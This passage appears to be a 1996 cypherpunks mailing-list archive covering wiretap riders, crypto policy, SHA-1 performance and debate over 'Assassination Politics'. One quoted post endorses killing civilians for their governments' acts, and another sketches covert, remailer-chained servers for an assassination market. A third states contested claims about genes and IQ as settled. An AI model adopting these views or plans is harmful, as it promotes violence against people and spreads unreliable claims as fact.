Legislators who have pet projects but not enough support to get them passed have a way of turning desperate during the closing days of the congressional session. Their thoughts turn ineluctably to unrelated appropriations bills. Only last week, Rep. Frank Wolf used the transportation funding bill as a vehicle for usurping the courts' role in a specific domestic relations dispute. Now senators working on the Commerce, State and Justice appropriations bill have slipped in provisions relating to wiretaps that have been before the Congress for 18 months but have not been adopted. The law should not be changed by means of these stealthy riders.

One of the substantive changes in the criminal laws ordered by the money committee, for example, would make it easier to obtain court orders authorizing "roving" wiretaps. This would permit putting taps on any phone a suspect might use -- including unspecified public phones -- without requiring, as the law now does, that the government show that the suspect is attempting to thwart a home or office tap by repeatedly changing phones. This may or may not be reasonable, but Congress considered and rejected it earlier this year. It shouldn't be shoved through on an appropriations bill.
The committee bill also increased the number of crimes for which a wiretap can be issued, adding a list of new, relatively imprecise offenses related to terrorism such as "providing material support to terrorists" and "terrorist acts transcending national borders." Taps already are allowed for just about every major crime in which a terrorist might engage, including bombing, arson, murder, kidnapping, extortion, espionage, sabotage, treason, hostage-taking and the destruction of trains, ships, aircraft and aircraft facilities. What, then, is the reason for adding these new elastic terms, which could include far less serious offenses that someone thinks might be linked to terrorism? The committees that dealt with the subject in April did not see fit to do so. Why now has the Appropriations Committee intervened?

The competing values of security and privacy rights require a much better sorting out. It's best done by people who have had the benefit of relevant testimony and experience. The appropriations committees are the wrong setting to deal with such questions, which should not be presented in a take-it-or-leave-it package with the government's continued operation at stake.

[End]

From snow at smoke.suba.com Thu Sep 26 22:11:04 1996
From: snow at smoke.suba.com (snow)
Date: Fri, 27 Sep 1996 13:11:04 +0800
Subject: AP
In-Reply-To:
Message-ID: <199609270203.VAA00536@smoke.suba.com>

Mr. KOTM wrote:
> Derek Bell writes:
> > In message , "Dr.Dimitri Vulis KOTM" writes:
> > >Yes, I do.
> > I'm not sure what you mean here. Is it:
> > 1. You hold people responsible for what they did, not what their government
> > did. (Assuming said people didn't take part in what the government did.)
> > 2. You agree that the IRA could justify killing any British citizen, even if
> > said citizen supported the IRA or agreed with its aims.
> > 3. Something else. (Please specify.)
> (Redirected to the list.)
> Any British citizen, irrespective of what s/he thinks about the IRA, has
> benefited economically from the 800 years of pillaging and genocide
> in Ireland. I see no problem if they pay with their lives for
> these crimes. Likewise I see no problem if U.S. civilians pay with
> their lives for their government's crimes in Iraq, even if they
> happen to disapprove of these crimes.

Does this mean that you are willing to pay for American Crimes, since you are obviously enjoying the results? Or that you are willing to pay for Russian and Soviet crimes?

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From snow at smoke.suba.com Thu Sep 26 22:14:22 1996
From: snow at smoke.suba.com (snow)
Date: Fri, 27 Sep 1996 13:14:22 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <9609251433.AB02026@cti02.citenet.net>
Message-ID: <199609270146.UAA00509@smoke.suba.com>

> On 25 Sep 96 at 5:59, Brian Davis wrote:
> > I disagree that that will be the response, but you should be willing
> > to allow one group of people to fight fire with fire.
> But generally, it has been found a much better solution to fight fire
> with water, and this is why I am not convinced of the ideological
> effectiveness of AP, although I don't doubt its operational
> effectiveness at all.

Having been a firefighter for about 4 years, I can say that for small fires water works quite a bit better. For larger fires (over a hundred acres or so) setting a backfire, or burning out the fuel in the direction the fire is probably going to go is a hell of a lot easier than hauling millions and millions of gallons or blood^h^h^h^h^h water.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From tcmay at got.net Thu Sep 26 22:17:55 1996
From: tcmay at got.net (Timothy C.
May) Date: Fri, 27 Sep 1996 13:17:55 +0800 Subject: The Road to Crypto Anarchy In-Reply-To: <9609261727.AA03280@cti02.citenet.net> Message-ID: At 4:51 PM -0700 9/26/96, Declan McCullagh wrote: >Anonymity and nonescrowed crypto are the linchpins of AP and its more >general case, Maysian crypto anarchy. The withering of the nation-state. >Whatever you want to call it. > >To prevent it, governments will ban both. A criminal law, passed in the >wake of say a bombing this fall in Washington, DC, banning nonescrowed >crypto. (Freeh will assert he has evidence the terrorists used PGPhone.) >And another law banning online anonymity. > >What then, Mr. Bell? > Though I'm not Bell, I have some interest in this question. I believe, and have argued this for at least several years, that we are in a "race to the fork in the road." The fork in the road being essentially the point of no return, beyond which things are either pulled strongly to one end or the other. The two ends being: * a surveillance state, with restrictions on cryptography, the spending of money, the holding of various items (besides just traditional things like guns and drugs), restrictions on the dissemination of information, and of course controls on lots of other things. (For those who think this scenario is ipso facto unconstitutional, look at the many moves already in this direction. Between Supreme Court decisions allowing searches and seizures without warrants (e.g., on buses, planes, etc.), restrictions on discussion of crypto in public places (ITARs), there are a raft of "Presidential Decision Directives" and "National Security Decision Directives" which grant the Executive wide powers to seize control of telecommunications systems, computer networks, emergency systems, etc. While this is fodder for conspiracy theory supporters, it concerns many civil liberties advocates as well.) 
* a libertarian or anarcho-capitalist state, with people using a variety of secure and private channels to interact, exchange information, buy and sell goods and services, and communicate transnationally. The "anarchy" being the same kind of anarchy seen in so many areas of life: reading choices, eating choices (except for drug laws), this list, and so on. (For those who think this scenario is hopelessy rosy, pointing out that people "can't eat cyberspace," this is surely so. But a large fraction of "interesting" interactions are already done on the Net, or via phones, or other such mechanisms. And even if many people are not in cyberspace at all, if enough of us _are_ and are _secure_, I'll settle for that. The rest can come later.) The reason I believe there's a point of no return is this: once, for example, enough strong, encrypted, black channels are available, it will essentially be too late to crack down and stop them. Add to the mix steganographic channels, lots of bandwidth over several mechanism, and it's too late. (Take the Digital Telephony Act. It mainly covers _telephones_ (though many of us have speculated that computer networks could be covered, especially if Internet telephony catches on in a big way). There is no way the tens of thousands of individual Linux boxes and whatnot can be made to comply with DT "wiretappability." The horse is out of the barn on this one, to use yet another related metaphor.) Declan is right that each major "incident"--Oklahoma City, TWA 800, etc.--jumps us forward toward a totalitarian surveillance state. However, each new anonymous remailer, each new Web site, each new T1 or whatever link, etc., moves us forward in the direction of crypto anarchy. On the issue of terrorists, child molestors, and other Horsemen using PGP, PGPhone, etc., how else could it be? 
After all, use of PGP is being promoted by folks like us, and many others, and the molestors, Mafiosos, money launderers, Palestinian Neo-Intifada (the war that just started this week) sympathizers, nuclear material smugglers, and other assorted miscreants (or heroes, depending on one's outlook) are surely thinking about securing their communications. So what? After all, as we've been pointing out for years, criminals and conspirators also have locks on their doors, use curtains on their windows, keep their voices down when speaking amongst themselves in public, rent hotel rooms to plot crimes, and generally use various methods to better ensure privacy and secrecy. And yet the Constitution is pretty clear that we don't insist windows be uncurtained, conversations be "escrowed," and locks have keys "escrowed." And so on, with various of the rights enumerated in the Bill of Rights covering these situations (4th, 1st, etc.). The inevitable use of strong crypto by some criminal, perhaps even a heinous one, will be used as an argument to restrict crypto. We have to be prepared. Meanwhile, deploy as much crypto stuff as possible. (When I spoke to Stewart Baker, former chief counsel at the NSA, at the CFP in early '95, we both knew the race was on. On opposite sides, of course.) Make no mistake about it, the faster and more ubiquitously we can deploy as much strong crypto as possible (e.g., the Gilmore SWAN thing, more remailers, offshore havens, etc.), the greater the likelihood we'll win. (And winning will have some rather interesting consequences for society.) I think there's currently about an 80% chance we'll win, with maybe a 30% chance that we've already won, that we've already reached the point of no return and are on the path to crypto anarchy. --Tim May 0 We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From chad at lycos.com Thu Sep 26 22:28:02 1996
From: chad at lycos.com (Chad Dougherty)
Date: Fri, 27 Sep 1996 13:28:02 +0800
Subject: ssh - How widely used?
In-Reply-To:
Message-ID: <324B490B.4016@lycos.com>

Black Unicorn wrote:
>
> Does anyone know if there are MS-Dos or Mac versions of the ssh client?
> How much is ssh used?
>

Secure shell is an amazing package. Get it immediately. There are no DOS or Mac versions, but there is one for windows. We use it here almost exclusively.

--
Chad Dougherty
Lycos, Inc.
"The Catalog of the Internet"
http://www.lycos.com
Phone: (412)261-6660x226
Email: chad at lycos.com

From eay at mincom.oz.au Thu Sep 26 22:28:21 1996
From: eay at mincom.oz.au (Eric Young)
Date: Fri, 27 Sep 1996 13:28:21 +0800
Subject: Public domain SHA-1 in C
In-Reply-To:
Message-ID:

On Thu, 26 Sep 1996, Steve Reid wrote:
> I've written an implementation of SHA-1 in C. Public domain, so you can
> hack it to your heart's content and/or use it however you want. You can
> download it from
> http://www.edmweb.com/steve/sha1.c
...
> It's reasonably fast (the 80 core SHA operations look good) but I'm
> certain that there's room for improvement.

Some times for this implementation
sha1 over a ~ 6 meg file, sparc 10
user time 5.23s 5.23s 5.14s

Replace your 'getc() into 256 byte buffer' loop with a 'read 16k at a time' (I actually put your functions into my sha1 digest program).
user time 3.79s 3.75s 3.72s

Use sha1 from SSLeay.
user time 2.32s 2.34s 2.24s

Using gcc -O3 -fomit-frame-pointer for all builds and I left out by B_ENDIAN advisory define; all permutations produced the same digest, so the 2 SHA1 implementations conform :-).

The key thing that speeds up the SSLeay sha1 is the avoidance of copying in the SHA1Update() type function. Have a look if you like (crypto/sha/sha_dgst.c). The actual SHA1 digesting on 64 bytes is probably identical. For most message digests, it appears the biggest problem is shoveling data into the algorithm fast enough.

eric

PS The MD2, MD5, SHA1 etc implemented in SSLeay are all stand alone functions/libraries that can be compiled and used outside of the SSLeay library build environment. This also applies to the IDEA, DES (libdes), RC2 and RC4 cipher subroutines present in the library.

For those on the cipherpunks list (which I don't frequent any-more), the current version is SSLeay 0.6.4, it can be built as a shared library under unix and will build as thread safe DLL's under Windows 3.1/95/NT. It is thread safe under unix as well (only really tested under Solaris 2.5.1).

http://www.psy.uq.oz.au/~ftp/Crypto
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps

--
Eric Young | BOOL is tri-state according to Bill Gates.
AARNet: eay at mincom.oz.au | RTFM Win32 GetMessage().

From jimbell at pacifier.com Thu Sep 26 22:32:54 1996
From: jimbell at pacifier.com (jim bell)
Date: Fri, 27 Sep 1996 13:32:54 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <199609270322.UAA14111@mail.pacifier.com>

At 04:51 PM 9/26/96 -0700, Declan McCullagh wrote:
>Anonymity and nonescrowed crypto are the linchpins of AP and its more
>general case, Maysian crypto anarchy. The withering of the nation-state.
>Whatever you want to call it.
>To prevent it, governments will ban both. A criminal law, passed in the
>wake of say a bombing this fall in Washington, DC, banning nonescrowed
>crypto.
(Freeh will assert he has evidence the terrorists used PGPhone.)
>And another law banning online anonymity.
>What then, Mr. Bell?

While we should continue to resist such developments, I (like many others) tend to believe that the government is going to have a great deal of difficulty implementing such restrictions, for reasons which have been discussed here ad nauseam. I happen to believe that the really crucial reason Clipper was proposed is so that it would exclude non-escrowed encryption using market forces, because they understood that banning encryption or non-escrowed encryption would be essentially impossible.

Remember the VHS/Beta VCR wars? With a fairly equal market in about 1978, Beta died 10 years later because the market couldn't support two incompatible standards. It wasn't that one was dramatically better than the other, it was simply that having two standards forced the market to duplicate stocks, for the machines as well as tapes, particularly pre-recorded tapes.

Notice, however, that VCR's are relatively "isolated": It doesn't really matter if you have one format and your neighbor has another, unless you want to swap tapes. But crypto telephones inherently require (in the long term) full intercompatibility. If you didn't have that, there'd be half a world of people you couldn't call!

(This kind of situation is reminiscent of a recollection my mother has of a small town she grew up in, in which there were two competing telephone companies serving the same area, but customers of company "A" couldn't call company "B." The most popular girl in town was the daughter of a doctor, who as a consequence of his profession had telephones from both companies. That girl was constantly being called to relay information between people on opposite telephone companies!)
The government understood this, and realized that the best way to derail the advent of a good crypto telephone standard was to produce one of their own, which they figured would pre-empt and kill off any competing system. It turns out that an essential element to this killing-off process is to ensure that the telephones aren't compatible, so I was a bit surprised to have to wait a long time to hear that one of the requirements for Clipper-phone approval is that they NOT co-operate with non-escrowed telephones. (I was surprised to have to WAIT to hear this, NOT that they said it eventually...) I think they realize that Clipper was their last opportunity to implement a de-facto market ban on good encryption, but it isn't working. As for a ban on anonymity I don't think that'll fly either. There are too many interactions we do today (off the 'net as well as on) which are already anonymous, even if we don't normally think of it that way. Visit a theater, pay cash, and nobody records your name, for instance. Buy groceries, pay cash. Throw coins in toll booth. Put coins in Coke machine, ride on bus, etc. It would be very hard to prohibit non-anonymous interactions on the net, with so many opportunities for unrestricted anonymity. There's even less reason to ID non-economic transactions too. Since most interactions on the 'net are not a financial transaction, there is even less reason to identify the people involved. So at the risk of being overly optimistic, I think the government isn't going to be able to pull off the kind of anti-crypto/anti-anonymity coup you describe. But nevertheless, I think that if they "progress" towards that goal against the odds, that could easily be an excellent justification for actions which you know they'll describe as "terrorism." Jim Bell jimbell at pacifier.com From pgf at acadian.net Thu Sep 26 22:34:15 1996 From: pgf at acadian.net (Phil Fraering) Date: Fri, 27 Sep 1996 13:34:15 +0800 Subject: a comment on AP vs. 
more peaceful resistance...
Message-ID:

You know, it occurred to me earlier that all of this AP stuff flooding the list is overlooking one thing about cryptography: in a way, its use and dissemination represents to some people a means of nonviolent protest.

Comments, anyone?

Phil Fraering          The above is the opinion of neither my internet
pgf at acadian.net     service provider nor my employer.
318/261-9649

From jamesd at echeque.com Thu Sep 26 22:38:37 1996
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 27 Sep 1996 13:38:37 +0800
Subject: Public Schools
Message-ID: <199609270229.TAA03286@dns2.noc.best.net>

Phil Fraering writes:
>> > Without vouchers, you don't say anything about the intelligence of
>> > your test subjects; to a _very_ large degree, intelligence isn't
>> > genetic.

Or Bag of shit wrote:
>> That's the politically correct thing to say, but do you have any
>> scientific evidence to support this claim?

At 11:19 PM 9/25/96 -0700, Dale Thorn wrote:
> People have argued for genetic disposition to certain things, and I
> think they are sometimes (most times?) confused [...]

[Lots of meaningless hand waving hot air deleted]

The key basic test of the power of genes is studies of identical twins raised in different families. They have near identical IQ's, and a wide range of very similar behavior.

Identical twins raised in different families are more similar than identical twins raised in the same family, probably because of deliberate attempts to differentiate themselves.

Except in the case of extreme environmental pressures -- starvation, neglect, and the like, genes count for just about everything, and environment for almost nothing.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.
| jamesd at echeque.com

From editor at cdt.org Thu Sep 26 22:50:11 1996
From: editor at cdt.org (Bob Palacios)
Date: Fri, 27 Sep 1996 13:50:11 +0800
Subject: CDT Policy Post 2.34 - House Committee Holds Hearing on Crypto Bill
Message-ID:

-----------------------------------------------------------------------------
   _____ _____ _______
  / ____|  __ \__   __|   ____        ___               ____             __
 | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
 | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
 | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
  \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
  The Center for Democracy and Technology  /____/         Volume 2, Number 34
----------------------------------------------------------------------------
   A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
CDT POLICY POST Volume 2, Number 34                      September 26, 1996

CONTENTS: (1) House Judiciary Committee Holds Hearing on Encryption Bill;
              NSA, DOJ Oppose Efforts to Promote Privacy Online
          (2) How to Subscribe/Unsubscribe to the Policy Post list
          (3) About CDT, contacting us

** This document may be redistributed freely with this banner intact **
Excerpts may be re-posted with permission of
** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) HOUSE JUDICIARY COMMITTEE HOLDS HEARING ON ENCRYPTION LEGISLATION; NSA, DOJ OPPOSE CONGRESSIONAL EFFORTS TO PROMOTE PRIVACY ONLINE

At a hearing before the House Judiciary Committee on Wednesday September 25, Deputy Attorney General Jamie Gorelick laid to rest any lingering suspicion that the Administration would agree to change current export controls on strong non-escrowed encryption.
Equally troubling to Internet users, Administration witnesses confirmed that the Government is seeking to compel domestic Internet users towards a "voluntary" key-escrow encryption system. The hearing was called to consider the "Security and Freedom through Encryption (SAFE) Act of 1996," (H.R. 3011) sponsored by Representatives Bob Goodlatte (R-VA), Anna Eshoo (D-CA), and a bi-partisan group of more than 43 other Representatives. The bill is designed to encourage the widespread availability of strong, easy to use encryption technology by relaxing current encryption export controls. The hearing -- the first before the House in nearly 3 years -- marked the first time the House Judiciary Committee has formally considered the encryption issue, and marks an important step along the path towards passage of real encryption policy reforms. Witnesses testifying before the Committee Wednesday: * Rep. Bob Goodlatte (R-VA), chief Sponsor of the HR 3011 * Jamie Gorelick, Deputy Attorney General * William Crowell, Deputy Director, National Security Agency * William Reinsch, Under Secretary of Commerce, Export Administration * Melinda Brown, VP and General Counsel, Lotus Development Corp. * Roberta Katz, VP and General Counsel, Netscape Communications Corp. * Patricia Rippley, Managing Director, Bear Stearns & Company * Dr. Charles Deneka, Senior VP and CTO, Corning, Inc (on behalf of the National Association of Manufacturers). REPORTS OF ADMINISTRATION COMPROMISE PROVE PREMATURE Although some press reports had suggested that the Administration was poised to announce a new compromise encryption policy in testimony before the Committee, these reports proved to be premature. In response to rumors that the administration would relax export controls on 56 bit DES encryption (encryption exports are currently limited to 40 bit keys) Gorelick stated that the Administration does not support the unrestricted export of 56 bit DES. 
However, Gorelick did confirm that the Administration plans to propose legislation soon, and suggested such a proposal would specify the process for law enforcement to access encryption keys held by third-parties. The proposal would include new civil penalties for the unauthorized disclosure of keys. Additionally, credible sources have told CDT that the Administration's new proposal will transfer jurisdiction for encryption exports from the State Department to the Commerce Department, and that domestic law enforcement will have a role in evaluating export applications. It is also likely that the Administration will again offer to raise the export limit from 40 to 64 bit key-lengths with law enforcement access. ADMINISTRATION REITERATES PLANS TO COMPEL USE OF KEY-ESCROW DOMESTICALLY Both Gorelick and NSA Deputy Director William Crowell stressed that the Administration is not seeking to mandate the domestic use of key-escrow encryption. However, both admitted that they would like to see the widespread adoption of key-escrow systems and have initiated a broad effort to encourage industry to develop such systems. In her prepared statement, Gorelick acknowledged that criminals will at times use non-escrowed encryption to communicate with themselves, but, "we believe that if strong key recovery encryption products that will not interoperate -- at least in the long term -- with non-key recovery products are made available overseas and domestically and become part of a global KMI (Key Management Infrastructure), such products will become the worldwide standard. Under those circumstances, even criminals will be compelled to use key recovery products, because even criminals need to communicate with legitimate organizations like banks, both nationally and internationally." 
The administration continues to insist that their policy is "voluntary", despite the fact that their policy is clearly designed to compel the use of key-escrow domestically through continued controls on encryption exports and negotiations with foreign governments through the OECD. This apparent double-talk from the Administration cannot be the basis for sound encryption policy reform. CONGRESS, INDUSTRY REMAIN SKEPTICAL OF ADMINISTRATION'S POSITION, STAGE IS SET FOR REAL REFORM NEXT YEAR Led by Representatives Bob Goodlatte (R-VA) and Zoe Lofgren (D-CA), members of the Judiciary Committee expressed a great deal of skepticism about the Administration's proposal. Rep. Goodlatte (a chief sponsor of the SAFE bill) testified that in his view, "the chief roadblock to electronic commerce on the Internet is government regulation of encryption." Goodlatte added, "The arguments that the FBI, CIA, and NSA have given me to justify the need for a massive 'key-escrow' or as it's now called 'key-recovery' plan just don't ring true in 1996." Representative Zoe Lofgren (D-CA), expressed concern that current US encryption policy is endangering the future of the US high-technology industry. Lofgren was also highly critical of the Administrations efforts to push for a global key-escrow standards through the OECD. Lofgren said: "The Deputy Attorney General also argues that the United States, combined with its allies, can control the world encryption market and can coordinate the implementation of an international 'key-escrow' regime. Notwithstanding the absence of any demonstrable progress towards such an agreement, the aspirations for a comprehensive global key escrow scheme ignore the undeniable power of market demand for cryptographic products that do not incorporate any form of escrow. The customers that purchase encryption products DO NOT WANT products with escrowed keys, and if use suppliers are forbidden to supply these products, then someone undoubtedly will. 
Whatever hopes we may have for an international system of key escrow, we will never achieve 100 percent participation, and those who do not participate will profit heavily at our expense." (emphasis in original) Several other members of the Committee, including Reps. Sonny Bono (R-CA), John Conyers (D-MI), Robert Scott (D-VA), and John Bryant (D-TX) echoed these concerns in their questions of the Administration witnesses. The fact that Committee members from both parties expressed deep skepticism of the Administration's proposal is an extremely encouraging preview of the debate when Congress resumes in January. Finally, witnesses testifying on behalf of the software industry, the securities industry and users of encryption technology all expressed support for the SAFE bill, and argued that current policy threatens the competitiveness of US businesses and Internet users. NEXT STEPS Time is running out in a busy election year Congressional calendar, and chances of passage of encryption reform legislation in either the House or Senate before the end of the current term are slim. However, the stage is clearly set for an all out battle when Congress returns in January, and support for encryption policy is clearly growing in Congress. Forty-five Republican and Democratic members of the House have signed on as co-sponsors of the Security and Freedom through Encryption Act (SAFE). The Burns/Leahy "Promotion of Commerce Online in the Digital Era (ProCODE) Act also enjoys broad bi-partisan support in the Senate. Meanwhile, the Administration continues to offer more of the same -- continued reliance on export controls while pushing for a global key-escrow standard. The stage is set, but the battle over U.S. encryption policy reform is only just beginning. CDT will continue to work to educate policy makers and the public on the importance of encryption policy reform. 
Over the next several months, stay tuned for more information on what you can do to help protect privacy and security on the Internet. ----------------------------------------------------------------------- (2) SUBSCRIPTION INFORMATION Be sure you are up to date on the latest public policy issues affecting civil liberties online and how they will affect you! Subscribe to the CDT Policy Post news distribution list. CDT Policy Posts, the regular news publication of the Center For Democracy and Technology, are received by nearly 10,000 Internet users, industry leaders, policy makers and activists, and have become the leading source for information about critical free speech and privacy issues affecting the Internet and other interactive communications media. To subscribe to CDT's Policy Post list, send mail to policy-posts-request at cdt.org with a subject: subscribe policy-posts If you ever wish to remove yourself from the list, send mail to the above address with a subject of: unsubscribe policy-posts ----------------------------------------------------------------------- (3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US The Center for Democracy and Technology is a non-profit public interest organization based in Washington, DC. The Center's mission is to develop and advocate public policies that advance democratic values and constitutional civil liberties in new computer and communications technologies. 
Contacting us: General information: info at cdt.org World Wide Web: URL:http://www.cdt.org/ FTP URL:ftp://ftp.cdt.org/pub/cdt/ Snail Mail: The Center for Democracy and Technology 1634 Eye Street NW * Suite 1100 * Washington, DC 20006 (v) +1.202.637.9800 * (f) +1.202.637.0968 ----------------------------------------------------------------------- End Policy Post 2.34 9/26/96 ----------------------------------------------------------------------- From declan at eff.org Thu Sep 26 22:56:54 1996 From: declan at eff.org (Declan McCullagh) Date: Fri, 27 Sep 1996 13:56:54 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <9609261727.AA03280@cti02.citenet.net> Message-ID: Anonymity and nonescrowed crypto are the linchpins of AP and its more general case, Maysian crypto anarchy. The withering of the nation-state. Whatever you want to call it. To prevent it, governments will ban both. A criminal law, passed in the wake of say a bombing this fall in Washington, DC, banning nonescrowed crypto. (Freeh will assert he has evidence the terrorists used PGPhone.) And another law banning online anonymity. What then, Mr. Bell? -Declan On Thu, 26 Sep 1996, Jean-Francois Avon wrote: > On 26 Sep 96 at 10:49, Brian Davis wrote: > > > If by "operation effectiveness" you mean some people will be killed, > > I agree. I also agree with the fire/water comment (maybe in more > > ways than one!); my comment related to my belief that AP-supporters > > shouldn't complain about especially draconian measures taken against > > them by governments, given their modus operandi. > > I don't think that any of them will complain because they understand > the nature of it. I think that Jim Bell (forgive me Jim...:) view > that there will be only limited retaliation from government is not > guaranteed at all. As I said somewhere previously, the whole thing > will depend on how the authorities view AP as (non-) attackable. 
> > Here is the post I wrote earlier: > > ------- earlier post ------- > > jim bell recently wrote: > > > Local police action against an AP organization would, of course, be > > deterred by the prospect of naming anybody who would go after it, > > and soliciting donations against them. > > I don't agree here. It would all be a matter of timing, unless the > number of AP servers would be sprouting out faster than police forces > would be able to destroy them. You have to realize that if the money > is seized, noboby will be willing to make a hit since the odds of > being paid are not too good. Just play the game "Command and Conquer" > for a while and you'll see. Money is fuel. Don't run off of it! > > For that reason, I think that any AP server, *at the introduction of > the concept* would have to be a covert operation. Servers could come out in > public light when their number be large enough to warrant a > strike on anybody trying to eliminate them. Same for the > publication of the name of the individuals operating the server. > > To me, this seems obvious. Comments? > > To go on along that line, I had the idea that a specific piece of > software, a bit like Private Idaho, that would chain remailers but > that would be specifically designed to handle predictions, would > have be designed. > > (Pardon my ignorance of the net here) > > The server need not to be a unique address. Actually, the > prediction and any accompanying documents could be splitted a la > Secure Split, and sent to N differents servers, M ( would be required to re-assemble the original prediction. This > assures that if one gets closed, the other can rebuild the message. > > If thoses servers were set up on *large* machines servicing tens of > thousands of messages a day, preferably located at a busy remailer > location, any exchange of information between them to rebuild the > prediction at a central location would not be easy to track by any > govt. > > Comments? 
> > ----- end of earlier post ----- > Jean-Francois Avon, Montreal QC Canada > DePompadour, Societe d'Importation Ltee > Finest Limoges porcelain and crystal > JFA Technologies, R&D consultant > physicists and engineers, LabView programming > PGP keys at: http://w3.citenet.net/users/jf_avon > ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 > > // declan at eff.org // I do not represent the EFF // declan at well.com // From stewarts at ix.netcom.com Thu Sep 26 23:24:42 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 27 Sep 1996 14:24:42 +0800 Subject: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer? Message-ID: <199609270017.RAA18940@dfw-ix7.ix.netcom.com> Tim May said, in a discussion on another topic While BU is a lawyer, and I am not, I maintain [........] Is it correct to say that "Black Unicorn is a lawyer", or only that the nym "Black Unicorn" is used by a person who's a lawyer under another name? "Black Unicorn" at least doesn't appear to be a _practicing lawyer_, though maybe [name used for legal work by person who also uses nym "Black Unicorn"] is a practicing lawyer. Tim's signature file no longer asserts that he's a Licensed Ontologist, but this seems to be the kind of question you'd ask a L.O. if you knew one. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From brock at well.com Thu Sep 26 23:33:17 1996 From: brock at well.com (Brock N. Meeks) Date: Fri, 27 Sep 1996 14:33:17 +0800 Subject: CWD--Wiretap In the Night Message-ID: <199609262154.OAA12076@well.com> CyberWire Dispatch // September // Copyright (c) 1996 // Jacking in from the "Smoked Filled Room" Port: Washington, DC -- Federal provisions funding the digital telephony bill and roving wiretaps, surgically removed earlier this year from an anti-terrorism bill, have quietly been wedged into a $600 billion omnibus spending bill. 

The bill creates a Justice Department "telecommunications carrier compliance fund" to pay for the provisions called for in the digital telephony bill, formally known as the Communications Assistance in Law Enforcement Act (CALEA). In reality, this is a slush fund.

Congress originally budgeted $500 million for CALEA, far short of the billions actually needed to build in instant wiretap capabilities into America's telephone, cable, cellular and PCS networks. This bill now approves a slush fund of pooled dollars from the budgets of "any agency" with "law enforcement, national security or intelligence responsibilities." That means the FBI, CIA, NSA and DEA, among others, will now have a vested interest in how the majority of your communications are tapped.

The spending bill also provides for "multipoint wiretaps." This is the tricked up code phrase for what amounts to roving wiretaps. Where the FBI can only tap one phone at a time in conjunction with an investigation, it now wants the ability to "follow" a conversation from phone to phone; meaning that if your neighbor is under investigation and happens to use your phone for some reason, your phone gets tapped. It also means that the FBI can tap public pay phones... think about that next time you call 1-800-COLLECT.

In addition, all the public and congressional accountability provisions for how CALEA money was spent, which were in the original House version (H.R. 3814), got torpedoed in the Senate Appropriations Committee.

Provisions stripped out by the Senate:

-- GONE: Money isn't to be spent unless an implementation plan is sent to each member of the Judiciary Committee and Appropriations committees.

-- GONE: Requirement that the FBI provide public details of how its new wiretap plan exceeds or differs from current capabilities.

-- GONE: Report on the "actual and maximum number of simultaneous surveillance/intercepts" the FBI expects.
The FBI ran into a fire storm earlier this year when it botched its long overdue report that said it wanted the capability to tap one out of every 100 phones *simultaneously*. Now, thanks to this funding bill, rather than having to defend that request, it doesn't have to say shit.

-- GONE: Complete estimate of the full costs of deploying and developing the digital wiretapping plan.

-- GONE: An annual report to Congress "specifically detailing" how all taxpayer money -- YOUR money -- is spent to carry out these new wiretap provisions.

"No matter what side you come down on this (digital wiretapping) issue, the stakes for democracy are that we need to have public accountability," said Jerry Berman, executive director of the Center for Democracy and Technology.

Although it appeared that no one in congress had the balls to take on the issue, one stalwart has stepped forward, Rep. Bob Barr (R-Ga.). He has succeeded in getting some of the accountability provisions back into the bill, according to a Barr staffer.

But the fight couldn't have been an easy one. The FBI has worked congress relentlessly in an effort to skirt the original reporting and implementation requirements as outlined in CALEA. Further, Barr isn't exactly on the FBI's Christmas card list. Last year it was primarily Barr who scotched the funding for CALEA during the 104th Congress' first session.

But Barr has won again. He has, with backing from the Senate, succeeded in *putting back* the requirement that the FBI must justify all CALEA expenditures to the Judiciary Committee. Further, the implementation plan, "though somewhat modified" will "still have some punch," Barr's staffer assured me. That includes making the FBI report on its expected capacities and capabilities for digital wiretapping. In other words, the FBI won't be able to "cook the books" on the wiretap figures in secret.

Barr also was successful in making the Justice Department submit an annual report detailing its CALEA spending to Congress.

However, the funding for digital wiretaps remains. Stuffing the funding measures into a huge omnibus spending bill almost certainly assures its passage. Congress is twitchy now, anxious to leave. They are chomping at the bit, sensing the end of the 104th Congress' tortured run as the legislative calendar is due to run out sometime early next week. Then they will all literally race from Capitol Hill at the final gavel, heading for the parking lot, jumping in their cars like stock car drivers as they make a mad dash for National Airport to return to their home districts in an effort to campaign for another term in the loopy world of national politics.

Congress is "going to try to sneak this (spending bill) through the back door in the middle of the night," says Leslie Hagan, legislative director for the National Association of Criminal Defense Lawyers. She calls this a "worst case scenario" that is "particularly dangerous" because the "deliberative legislative process is short-circuited."

Such matters as wiretapping deserve to be aired in the full sunlight of congressional hearings, not stuffed into an 11th hour spending bill. This is legislative cowardice. Sadly, it will most likely succeed.

And through this all, the Net sits mute.

